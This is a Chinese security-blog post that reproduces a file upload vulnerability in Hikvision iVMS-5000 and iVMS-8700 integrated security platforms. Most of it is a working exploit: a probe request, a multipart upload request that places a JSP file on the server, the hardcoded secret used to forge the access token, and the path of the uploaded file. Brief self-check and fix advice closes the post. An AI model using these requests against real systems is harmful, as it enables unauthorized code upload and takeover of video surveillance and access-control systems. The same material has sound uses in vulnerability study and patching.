点击上方蓝字
关注我们
本文仅用于参考和学习交流,对于使用本文所提供的信息所造成的任何直接或间接的后果和损失,使用者需自行承担责任。本文的作者以及本公众号团队对此不承担任何责任。请在使用本文内容时谨慎评估风险并做出独立判断。谢谢!
前言
综合安防系统是一款功能强大的综合性管理平台,其特点是视频监控与门禁一卡通的深度融合,海康的系统在系统中大量存在,出于学习的目的,通过授权测试对象对该漏洞进行研究和复现。
正文
影响版本
01
海康威视综合安防系统iVMS-5000
海康威视综合安防系统 iVMS-8700
漏洞探测
02
POST /eps/api/resourceOperations/upload HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://ip:port
Connection: close
Cookie: ISMS_8700_Sessionname=7634604FBE659A8532E666FE4AA41BE9
Upgrade-Insecure-Requests: 1
Content-Length: 62
service=http%3A%2F%2Fip:port%3Ax%2Fhome%2Findex.action
漏洞验证
03
POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
Upgrade-Insecure-Requests: 1
Content-Length: 174
------WebKitFormBoundaryGEJwiloiPo
Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
Content-Type: image/jpeg
test
------WebKitFormBoundaryGEJwiloiPo
其中token的值为
MD5(http://ip:port/eps/api/resourceOperations/uploadsecretKeyIbuilding)的值
访问上传文件的路径为http://ip:port/eps/upload/resourceUuid.jsp
漏洞自查与修复
04
自查方式:通过发送前文提到的漏洞探测数据包,观察返回的状态码为200,并且提示token empty!字样则可能存在漏洞,需要及时排查修复。
修复建议:关闭互联网暴露面访问的权限,文件上传模块做好权限强认证。
参考链接:
https://blog.csdn.net/qq_50854662/article/details/131481634
后记
🌟 诚邀您点赞!点亮我们共同的故事,为我们的公众号加油!🔥🔥🔥
亲爱的读者,您的一个赞,对我们来说是无比的鼓励和动力。每一次点赞,都是您对我们内容的认可和支持,也是我们持续创作的动力源泉。
在点赞的同时,也请您分享我们的内容给更多的朋友,让更多的人了解我们的公众号,一起分享知识和快乐。您的支持,是我们前行的最大动力!🚀🚀🚀
让我们一起,为知识点赞,为生活点赞,为梦想点赞!🌟🌟🌟
扫码关注
原文始发于微信公众号(玄知安全实验室):海康iVMS综合安防存在文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论